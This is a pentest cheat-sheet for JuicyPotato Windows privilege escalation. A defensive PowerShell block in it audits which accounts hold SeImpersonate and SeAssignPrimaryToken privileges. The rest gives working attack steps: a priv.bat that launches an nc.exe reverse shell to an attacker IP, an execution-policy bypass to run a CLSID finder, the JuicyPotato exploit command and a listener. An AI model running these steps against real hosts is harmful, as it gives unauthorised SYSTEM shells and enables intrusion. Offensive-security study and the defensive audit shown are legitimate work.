Juicypotato
Check whether SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is enabled for the current user with whoami /priv or whoami /all
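From the defender's side, the same check is worth running host-wide: which accounts and groups hold these two privileges, and whether any of them is outside the stock set. The PowerShell below is an added example, not part of the original notes; it exports the local security policy with secedit (an elevated prompt is required), parses the two rights, translates the SIDs to names, and flags holders that are not in a baseline set. The baseline (Administrators, LOCAL SERVICE, NETWORK SERVICE, SERVICE for SeImpersonatePrivilege; LOCAL SERVICE and NETWORK SERVICE for SeAssignPrimaryTokenPrivilege) is an assumption taken from a default Windows install and should be adjusted for hosts that legitimately grant the right, e.g. IIS application pool identities.

```powershell
# Added example: audit which principals hold the two token privileges on this host.
# Assumes an elevated prompt (secedit /export needs admin) and a writable $env:TEMP.
$inf = Join-Path $env:TEMP 'secpol-export.inf'
secedit /export /cfg $inf /quiet | Out-Null
$lines = Get-Content $inf

# Assumed baseline holders on a default install; adjust for the host's actual role.
$baseline = @{
    'SeImpersonatePrivilege'        = @('BUILTIN\Administrators', 'NT AUTHORITY\LOCAL SERVICE',
                                        'NT AUTHORITY\NETWORK SERVICE', 'NT AUTHORITY\SERVICE')
    'SeAssignPrimaryTokenPrivilege' = @('NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\NETWORK SERVICE')
}

function Resolve-PolicyEntry {
    param([string]$Entry)
    # secedit writes SIDs with a leading '*'; translate to DOMAIN\name where possible.
    if ($Entry.StartsWith('*')) {
        $sid = New-Object -TypeName System.Security.Principal.SecurityIdentifier -ArgumentList $Entry.Substring(1)
        try { return $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { return $Entry }
    }
    return $Entry
}

foreach ($priv in $baseline.Keys) {
    $line = $lines | Where-Object { $_ -match "^$priv\s*=" } | Select-Object -First 1
    if (-not $line) { Write-Output "$priv : no holders listed"; continue }

    $holders = ($line -split '=', 2)[1].Trim() -split ',' |
        ForEach-Object { Resolve-PolicyEntry -Entry $_.Trim() }

    Write-Output "$priv : $($holders -join ', ')"
    $extra = $holders | Where-Object { $baseline[$priv] -notcontains $_ }
    if ($extra) { Write-Output "  non-baseline holders (review): $($extra -join ', ')" }
}

Remove-Item $inf -ErrorAction SilentlyContinue
```

Any account that shows up as a non-baseline holder, or any service or application pool running as LOCAL SERVICE / NETWORK SERVICE that does not need to impersonate, is the thing to tighten: the technique on this page is only available to a process that already holds one of these rights. JuicyPotato's own README also notes it does not work on Windows Server 2019 and Windows 10 build 1809 onward, so the build level matters for risk assessment.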
Requirement
Potato exe: https://github.com/ohpe/juicy-potato/releases
Note: there are other executables besides JuicyPotato, such as RottenPotato and SweetPotato, which can be used under certain circumstances: https://jlajara.gitlab.io/Potatoes_Windows_Privesc
Create priv.bat for the reverse privileged shell:
echo "C:\Windows\Tasks\nc.exe -e cmd.exe <attacker ip> <port>" > priv.bat
Transfer nc.exe (on Kali: /usr/share/windows-resources/binaries/nc.exe)
Script GetCLSID.ps1 for finding a CLSID: https://ohpe.it/juicy-potato/CLSID/
powershell -executionpolicy bypass -file GetCLSID.ps1 > cls.txt
Sometimes a CLSID is not required.
Transfer all files to the Windows host
Exploit
.\JuicyPotato.exe -p "C:\Windows\Tasks\priv.bat" -l 4444 -t * -c {653C5148-4DCE-4905-9CFD-1B23662D3D9E}
-l is the listening port (same as in priv.bat), -c is the CLSID
nc -nvlp 4444